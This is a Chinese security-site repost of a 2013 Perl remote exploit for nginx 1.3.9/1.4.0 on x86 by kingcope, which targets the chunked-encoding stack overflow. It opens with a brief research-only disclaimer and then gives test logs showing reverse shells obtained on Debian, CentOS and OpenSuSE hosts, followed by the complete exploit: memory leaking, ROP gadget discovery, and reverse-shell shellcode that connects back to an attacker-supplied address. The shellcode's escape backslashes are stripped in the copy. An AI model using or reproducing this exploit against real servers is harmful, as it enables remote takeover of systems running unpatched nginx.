测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- #nginx 1.3.9/1.4.0 x86 brute force remote exploit
- # copyright (c) 2013 kingcope
- #----------------------------
- #fix for internet exploitation, set MTU:
- #ifconfig <interface> mtu 60000 up
- #
- ###
- # !!! WARNING !!!
- # this exploit is unlikely to succeed when used against remote internet hosts.
- # the reason is that nginx uses a non-blocking read() at the remote connection,
- # this makes exploitation of targets on the internet highly unreliable.
- # (it has been tested against a testbed on the internet but I couldn't exploit
- # any other box with it. required was the above ifconfig setting on the client.
- # maybe enabling large tcp frame support on a gigabit connection is more
- # useful)
- # so use it inside intranets only (duh!), this remains a PoC for now :D
- # The exploit does not break stack cookies but makes use of a reliable method
- # to retrieve all needed offsets for Linux x86 and pop a shell.
- ###
- #TODO
- #*cleanup code
- #*implement stack cookie break and amd64 support
- #*support proxy_pass directive
- ###
- =for comment
- TARGET TESTS (Debian,Centos,OpenSuSE)
- 1.Debian7
- perl ngxunlock.pl 192.168.27.14680192.168.27.146443
- Testingif remote httpd is vulnerable % SEGV %
- YES %
- Finding align distance (estimate)
- testing 5250 align % SEGV %
- testing 5182 align % SEGV %
- Verifying align
- Finding align distance (estimate)
- testing 5250 align % SEGV %
- testing 5182 align % SEGV %
- Finding write offset, determining exact align
- testing 0x08049c50,5184 align % SURVIVED %
- Extracting memory
- bin search done, read 20480 bytes
- exact align found 5184
- Finding exact library addresses
- trying plt 0x08049a32, got 0x080bc1a4,function0xb76f4a80% FOUND exact ioctl 0x08049a30%
- trying plt 0x08049ce2, got 0x080bc250,function0xb773e890% FOUND exact memset 0x08049ce0%
- trying plt 0x08049d52, got 0x080bc26c,function0xb76f8d40% FOUND exact mmap64 0x08049d50%
- Found library offsets, determining mnemonics
- trying 0x0804ed2d% SURVIVED %
- exact large pop ret 0x0804a7eb
- exact pop x3 ret 0x0804a7ee
- bin search done|
- See reverse handler for success
- nc -v -l -p 443
- listening on [any]443...
- 192.168.27.146: inverse host lookup failed:Unknown host
- connect to [192.168.27.146]from(UNKNOWN)[192.168.27.146]34778
- uname -a;id;
- Linux dakkong 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux
- uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
- cat /etc/debian_version
- 7.1
- 2.CentOS6.4
- perl ngxunlock.pl 192.168.27.12980192.168.27.129443
- Testingif remote httpd is vulnerable % SEGV %
- YES %
- Finding align distance (estimate)
- testing 5250 align % SEGV %
- testing 5194 align % SEGV %
- Verifying align
- Finding align distance (estimate)
- testing 5250 align % SEGV %
- testing 5194 align % SEGV %
- Finding write offset, determining exact align
- testing 0x08049990,5200 align % SURVIVED %
- Extracting memory /
- bin search done, read 20480 bytes
- exact align found 5200
- Finding exact library addresses
- trying plt 0x080499f2, got 0x080b31ac,function0x0094a6b0% FOUND exact memset 0x080499f0%
- trying plt 0x08049b52, got 0x080b3204,function0x008f1fd0% FOUND exact ioctl 0x08049b50%
- trying plt 0x08049f12, got 0x080b32f4,function0x008f72c0% FOUND exact mmap64 0x08049f10%
- Found library offsets, determining mnemonics
- trying 0x0804e9d4% SURVIVED %
- exact large pop ret 0x0806194d
- exact pop x3 ret 0x0804a832
- bin search done/
- See reverse handler for success
- nc -v -l 443
- Connectionfrom192.168.27.129 port 443[tcp/https] accepted
- uname -a;id;
- Linux localhost.localdomain 2.6.32-358.el6.i686#1 SMP Thu Feb 21 21:50:49 UTC 2013 i686 i686 i386 GNU/Linux
- uid=99(nobody) gid=99(nobody) groups=99(nobody) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
- cat /etc/redhat*
- CentOS release 6.4(Final)
- 3.OpenSuSE12.1
- perl ngxunlock.pl 192.168.27.13580192.168.27.135443
- Testingif remote httpd is vulnerable % SEGV %
- YES %
- Finding align distance (estimate)
- testing 5250 align % SEGV %
- testing 5182 align % SEGV %
- Verifying align
- Finding align distance (estimate)
- testing 5250 align % SEGV %
- testing 5182 align % SEGV %
- Finding write offset, determining exact align
- testing 0x08049a18,5184 align % SURVIVED %
- Extracting memory
- bin search done, read 20480 bytes
- exact align found 5184
- Finding exact library addresses
- trying plt 0x08049a6a, got 0x080be08c,function0xb75f74f0% FOUND exact memset 0x08049a68%
- trying plt 0x08049b8a, got 0x080be0d4,function0xb764b160% FOUND exact ioctl 0x08049b88%
- trying plt 0x08049eea, got 0x080be1ac,function0xb76501e0% FOUND exact mmap64 0x08049ee8%
- Found library offsets, determining mnemonics
- trying 0x0804ea7f% SURVIVED %
- exact large pop ret 0x0804a7fa
- exact pop x3 ret 0x0804a101
- bin search done-
- See reverse handler for success
- Connectionfrom192.168.27.135 port 443[tcp/https] accepted
- uname -a;id;
- Linux linux-01xg3.1.0-1.2-desktop #1 SMP PREEMPT Thu Nov 3 14:45:45 UTC 2011 (187dde0) i686 i686 i386 GNU/Linux
- uid=65534(nobody) gid=65533(nobody) groups=65533(nobody),65534(nogroup)
- cat /etc/SuSE-*
- openSUSE
- VERSION =12.1
- openSUSE 12.1(i586)
- VERSION =12.1
- CODENAME =Asparagus
- =cut
- use IO::Socket;
- if($#ARGV < 3) {
- print"nginx remote exploit ";
- print"copyright (c) 2013 kingcope ";
- print"usage: $0 <target> <target port> <reverse ip> <reverse port> ";
- exit;
- }
- $target = $ARGV[0];
- $targetport = $ARGV[1];
- $cbip = $ARGV[2];
- $cbport = $ARGV[3];
- #linux reverse shell by bighawk
- $lnxcbsc =
- "x31xc0x31xdbx31xc9xb0x46xcdx80x90x90x90x6ax66x58x6ax01x5b"
- ."x31xc9x51x6ax01x6ax02x89xe1xcdx80x68"
- ."x7fx7fx7fx7f"# IP
- ."x66x68"."xb0xef"# PORT
- ."x66x6ax02x89xe1x6ax10x51x50x89xe1x89xc6x6ax03x5bx6ax66"
- ."x58xcdx80x87xf3x6ax02x59xb0x3fxcdx80x49x79xf9xb0x0bx31xd2"
- ."x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53x89xe1xcdx80";
- ($a1, $a2, $a3, $a4)= split(//, gethostbyname("$cbip"));
- substr($lnxcbsc,31,4, $a1 . $a2 . $a3 . $a4);
- ($p1, $p2)= split(//, reverse(pack("s", $cbport)));
- $p1 = chr(ord($p1));
- $p2 = chr(ord($p2));
- substr($lnxcbsc,37,2, $p1 . $p2);
- $|=1;
- $uri="";
- ###test target vulnerable
- #XXX
- #$k = 0x80498d0;
- #$align2 = 5200;
- #$alignplus=0;
- #goto debug;
- print"Testing if remote httpd is vulnerable ";
- $uritested =0;
- test:
- goto l;
- connecterr:
- if($j==0){
- print" Destination host unreachable ";
- exit;
- }
- goto again;
- l:
- for($j=0;$j<15;$j++){
- again:
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto connecterr};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: close "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V",0xc0debabe);
- twinkle();
- print $sock $req;
- send($sock,"A" x (5555-1024). $stack, MSG_OOB);
- $l = read($sock, $buffer,0x10);
- close($sock);
- twinkle();
- if($buffer =~/HTTP/1.1/){
- next;
- }
- if($l <=0){
- print"% SEGV % ";
- print"YES % ";
- goto yes;
- }
- }
- if($uritested ==0){
- $uri ="50x.html";
- $uritested=1;
- goto test;
- }
- print" \\ NO % ";
- print"\\ Try to increase client MTU with ifconfig <interface> mtu 60000 up \\ Debug output ";
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto connecterr};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="GET / HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V",0xc0debabe);
- print $sock $req;
- send($sock,"A" x (5555-1024). $stack, MSG_OOB);
- $line =0;
- while(<$sock>){
- print;
- if($line >30){
- last;
- }
- }
- exit;
- ###find align
- $verifyalign =0;
- yes:
- print"Finding align distance (estimate) ";
- for($align=4050;$align<6000;$align+=100){
- for($j=0;$j<15;$j++){
- printf("testing %d align ",$align);
- again0_1:
- # $sock = IO::Socket::INET->new(PeerAddr => $target,
- # PeerPort => $targetport,
- # Proto => 'tcp') || {goto again0_1};
- # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000);
- # $req = "HEAD /$uri HTTP/1.1 Host: $target "
- # ."Connection: close ";
- # print $sock $req;
- # close($sock);
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again0_1};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V",0xc0debabe);
- print $sock $req;
- send($sock,"A" x ($align-1024). $stack, MSG_OOB);
- $l = read($sock, $buffer,0x10);
- twinkle();
- close($sock);
- if($l <=0){
- if($align ==4050){
- gotoout;
- }
- print" % SEGV % ";
- $alignstart = $align-100;
- goto incalign;
- }
- print" ";
- if($buffer =~/HTTP/1.1/){
- next;
- }
- close($sock);
- }
- }
- out:
- print" \\ Align not found ";
- exit;
- incalign:
- for($align=$alignstart;$align<6000;$align++){
- for($j=0;$j<7;$j++){
- printf("testing %d align ",$align);
- again0_2:
- # $sock = IO::Socket::INET->new(PeerAddr => $target,
- # PeerPort => $targetport,
- # Proto => 'tcp') || {goto again0_2};
- # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000);
- # $req = "HEAD /$uri HTTP/1.1 Host: $target "
- # ."Connection: close ";
- # print $sock $req;
- # close($sock);
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again0_2};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V",0xc0debabe);
- print $sock $req;
- send($sock,"A" x ($align-1024). $stack, MSG_OOB);
- $l = read($sock, $buffer,0x10);
- twinkle();
- close($sock);
- if($l <=0){
- print" % SEGV % ";
- if($verifyalign ==0){
- print"Verifying align ";
- $verifyalign = $align;
- goto yes;
- }
- if(($align > $verifyalign +4)||($align < $verifyalign -4)){
- print"\\ Align and verfied align do not match ";
- exit;
- }
- if($verifyalign < $align){
- $align = $verifyalign;
- }
- gotobegin;
- }
- print" ";
- if($buffer =~/HTTP/1.1/){
- next;
- }
- close($sock);
- }
- }
- print" \\ could not find align value. bailing out";
- exit;
- ###find write offset
- begin:
- print"Finding write offset, determining exact align ";
- $align2 = $align;
- $ok =0;
- #for ($k=0x8049d30;$k<=0x0804FFFF;$k+=4) {
- for($k=0x08049800;$k<=0x0804FFFF;$k+=4){
- #for ($k=0x0804dc00;$k<=0x0804FFFF;$k+=4) {
- for($alignplus=0;$alignplus<7;$alignplus++){
- debug:
- for($j=0;$j<10;$j++){
- if(pack("V", $k)=~/x20/){
- next;
- }
- $align = $align2 + $alignplus;
- printf("testing 0x%08x, %d align ",$k,$align);
- again1:
- # if ($ok==0) {
- # $sock = IO::Socket::INET->new(PeerAddr => $target,
- # PeerPort => $targetport,
- # Proto => 'tcp') || {goto again1};
- # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000);
- # $req = "HEAD /$uri HTTP/1.1 Host: $target "
- # ."Connection: close ";
- # print $sock $req;
- # close($sock);
- # }
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again1};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- # $k = 0x8049e30; #XXX
- $stack = pack("V", $k)# write plt assumed,eg 0x804ab6c
- ."ZZZZ"# crash dummy
- ."x03x00x00x00"# write file descriptor
- . pack("V", $k-0x1000)# write buffer
- ."xffxffxf0x00";# write size
- #$p = <stdin>;
- print $sock $req;
- if($ok ==0){
- send($sock,"A" x ($align-1024). $stack ."A" x 1000, MSG_OOB);
- }else{
- send($sock,"A" x ($align-1024). $stack ."A" x 500, MSG_OOB);
- }
- $l = read($sock, $buffer,0x5000);
- twinkle();
- close($sock);
- #0x8049c50
- if($buffer =~/HTTP/1.1/){
- if($ok ==0){
- print" ";
- next;
- }else{
- goto again1;
- }
- }
- if($ok ==1&& length($buffer)<0x2000){
- goto again1;
- }
- if(length($buffer)>350){
- if($ok ==0){
- $ok =1;
- print" % SURVIVED % ";
- print("Extracting memory ");
- goto again1;
- }
- print" bin search done, ";
- printf("read %d bytes ", $l);
- goto hit;
- }
- print" ";
- }
- }
- }
- print" \\unable to get write offset ";
- exit;
- hit:
- printf("exact align found %d ", $align);
- print"Finding exact library addresses ";
- $write = $k;
- $writeless = $write-0x1000;
- ### find offsets for mmap64, memset and ioctl
- $mmap64 ="";
- $ioctl ="";
- $memset ="";
- $mmap64_prefix =
- "x55x53x56x57x8bx54x24x28"
- ."x8bx4cx24x2cxf7xc2xffx0f"
- ."x00x00x75";
- $ioctl_prefix =
- "x53x8bx54x24x10x8bx4cx24"
- ."x0cx8bx5cx24x08xb8x36x00"
- ."x00x00";
- $memset_prefix =
- "x53x8bx4cx24x10x0fxb6x44"
- ."x24x0cx88xc4x89xc2xc1xe0"
- ."x10x09xd0x8bx54x24x08x83";
- $memset_prefix2 =
- "xfcx57x8bx54x24x08x8bx4c"
- ."x24x10x0fxb6x44x24x0cxe3"
- ."x2cx89xd7x83xe2x03x74x11";
- $memset_prefix3 =
- "x57x8bx7cx24x08x8bx54x24"
- ."x10x8ax44x24x0cx88xc4x89"
- ."xc1xc1xe0x10x66x89xc8xfc";
- $memset_prefix4 =
- "x55x89xe5x57x56x83xecx04".
- "x8bx75x08x0fxb6x55x0cx8b".
- "x4dx10x89xf7x89xd0xfcx83";
- $buffer2 = $buffer;
- $buffer3 = $buffer;
- plt_again:
- $buffer2 = $buffer3;
- for(;;){
- $i = index($buffer2,"xffx25");
- if($i >=0){
- if(($j = index($buffer3, substr($buffer2, $i,50)))<=0){
- $buffer2 = substr($buffer2, $i+2);
- next;
- }
- $buffer2 = substr($buffer2, $i+2);
- $address = $writeless + $j;
- ### delve into library function
- printf "trying plt 0x%08x, ",($address+2);
- again2:
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again2};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V", $write)# write plt
- ."ZZZZ"# crash dummy
- ."x03x00x00x00"# write file descriptor
- . pack("V", $address+2)# write buffer
- ."x00x03x00x00";# write size
- print $sock $req;
- send($sock,"A" x ($align-1024). $stack ."A" x 1000, MSG_OOB);
- $l = read($sock, $buffer,0x300);
- if($buffer =~/HTTP/1.1/){
- goto again2;
- }
- if($l ==0x300){
- $gotentry = unpack("V", substr($buffer,0,4));
- if($gotentry ==0){
- print" ";
- next;
- }
- close($sock);
- }else{
- close($sock);
- goto again2;
- }
- printf "got 0x%08x, ", $gotentry;
- again3:
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again3};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V", $write)# write plt
- ."ZZZZ"# crash dummy
- ."x03x00x00x00"# write file descriptor
- . pack("V", $gotentry)# write buffer
- ."x00x03x00x00";# write size
- print $sock $req;
- send($sock,"A" x ($align-1024). $stack ."A" x 1000, MSG_OOB);
- $l = read($sock, $buffer,0x300);
- close($sock);
- if($buffer =~/HTTP/1.1/){
- goto again3;
- }
- if($l ==0x300){
- $function = unpack("V", substr($buffer,0,4));
- }else{
- goto again3;
- }
- if($function ==0){
- print" ";
- next;
- }
- printf "function 0x%08x ", $function;
- again4:
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again4};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V", $write)# write plt
- ."ZZZZ"# crash dummy
- ."x03x00x00x00"# write file descriptor
- . pack("V", $function)# write buffer
- ."xffxffxf0x00";# write size
- print $sock $req;
- send($sock,"A" x ($align-1024). $stack ."A" x 1000, MSG_OOB);
- #$p = <stdin>;
- $l = read($sock, $buffer,0x500);
- close($sock);
- if($buffer =~/HTTP/1.1/){
- goto again4;
- }
- if($l !=0x500){
- goto again4;
- }
- ###
- if(substr($buffer,0, length($mmap64_prefix)) eq
- $mmap64_prefix){
- $mmap64 = $address;
- printf(" %% FOUND exact mmap64 0x%08x %% ", $mmap64);
- }
- if((substr($buffer,0, length($memset_prefix)) eq
- $memset_prefix)or
- (substr($buffer,0, length($memset_prefix2)) eq
- $memset_prefix2)or
- (substr($buffer,0, length($memset_prefix3)) eq
- $memset_prefix3)or
- (substr($buffer,0, length($memset_prefix4)) eq
- $memset_prefix4)){
- $memset = $address;
- printf(" %% FOUND exact memset 0x%08x %% ", $memset);
- }
- if(substr($buffer,0, length($ioctl_prefix)) eq
- $ioctl_prefix){
- $ioctl = $address;
- printf(" %% FOUND exact ioctl 0x%08x %% ", $ioctl);
- }
- if(($mmap64 ne "")and($memset ne "")and($ioctl ne "")){
- goto gotplt;
- }
- print" ";
- }else{
- last;
- }
- }
- print" Finding exact library addresses ";
- goto plt_again;
- gotplt:
- print"Found library offsets, determining mnemonics ";
- ### find pop pop pop ret
- ### to set socket blocking
- for($k=$write +0x5000;;$k++){
- printf("trying 0x%08x ",$k);
- again5:
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again5};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: keep-alive "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V", $ioctl)
- . pack("V", $k)# pop pop pop ret assumed
- ."x03x00x00x00"
- ."x21x54x00x00"
- ."x08x80x04x08"# null byte
- . pack("V", $write)# write plt found
- ."ZZZZ"# crash dummy
- ."x03x00x00x00"# write file descriptor
- . pack("V", $write)# write buffer
- ."xffxffx0fx00";# write size
- print $sock $req;
- send($sock,"A" x ($align-1024). $stack ."A" x 1000, MSG_OOB);
- #$p = <stdin>;
- $l = read($sock, $buffer,0xfffff);
- close($sock);
- twinkle();
- if($buffer =~/HTTP/1.1/){
- again5;
- }
- if($l >0xfff){
- print" % SURVIVED % ";
- close($sock);
- goto hit2;
- }
- print" ";
- next;
- }
- hit2:
- ###send attack buffer
- ###find largepopret
- @matches= $buffer =~/(x83xc4x20[x58x5bx59x5ax5ex5fx5d][x58x5bx59x5ax5ex5fx5d][x58x5bx59x5ax5ex5fx5d]xc3)/g;
- foreach $m (@matches){
- $i = index($buffer, $m);
- twinkle();
- print" ";
- if($i >=0){
- $__largepopret = $write + $i;
- printf("exact large pop ret 0x%08x ", $__largepopret);
- goto hit3;
- }
- }
- print"\\ large pop ret not found ";
- exit;
- hit3:
- ###find poppoppopret
- @matches= $buffer =~/([x58x5bx59x5ax5ex5fx5d][x58x5bx59x5ax5ex5fx5d][x58x5bx59x5ax5ex5fx5d]xc3)/g;
- foreach $m (@matches){
- $i = index($buffer, $m);
- if($i >=0){
- $__poppoppopret = $write + $i;
- printf("exact pop x3 ret 0x%08x ", $__poppoppopret);
- goto attack;
- }
- }
- print"\\ poppoppopret not found ";
- exit;
- attack:
- $largepopret = pack("V", $__largepopret);
- $popblock ="x00x00x00x00"
- ."x00x00x00x00"
- ."x00x00x00x00"
- ."x00x00x00x00";
- $popret = pack("V", $__poppoppopret+2);
- $poppoppopret = pack("V", $__poppoppopret);
- $pop3ret = $__poppoppopret;
- $copycode ="xfcx8bxf4xbfx00x01x00x10xb9x00x02x00x00xf3xa4"
- ."xebxff";
- $memsetcode ="";
- $copyaddress =0x10000000;
- for($i=0;$i<length($copycode);$i++){
- $byte = substr($copycode, $i,1);
- $memsetcode .= pack("V", $memset)
- . pack("V", $pop3ret)
- . pack("V", $copyaddress)
- . $byte ."x00x00x00"
- ."x01x00x00x00";
- $copyaddress++;
- }
- for($q=0;$q<10;$q++){
- print"bin search done ";
- sleep(1);
- twinkle();
- print" "
- }
- print" ";
- print"See reverse handler for success ";
- again6:
- $sock = IO::Socket::INET->new(PeerAddr=> $target,
- PeerPort=> $targetport,
- Proto=>'tcp')||{goto again6};
- setsockopt($sock, SOL_SOCKET, SO_SNDBUF,60000);
- $req ="HEAD /$uri HTTP/1.1 Host: $target "
- ."Connection: close "
- ."Transfer-Encoding:chunked ";
- $req .="0" x (1024-length($req)-16)."8000000000003770";
- $stack = pack("V", $mmap64)
- . $largepopret
- ."x00x00x00x10"# mmap start
- ."x00x10x00x00"# mmap size
- ."x07x00x00x00"# mmap prot
- ."x32x00x00x00"# mmap flags
- ."xffxffxffxff"# mmap fd
- ."x00x00x00x00"# mmap offset
- ."x00x00x00x00"# mmap offset
- . $popblock
- . $memsetcode
- ."x00x00x00x10"# JUMP TO 0x10000000 (rwxp addr)
- ."x90" x 100. $lnxcbsc;
- #$p = <stdin>;
- print $sock $req;
- send($sock,"A" x ($align-1024). $stack ."A" x 1000, MSG_OOB);
- close($sock);
- goto again6;# XXX
- my $current =0;
- sub twinkle {
- $cursors[0]="|";
- $cursors[1]="/";
- $cursors[2]="-";
- $cursors[3]="\";
- print"$cursors[$current++]";
- if($current >3){
- $current =0;
- }
- }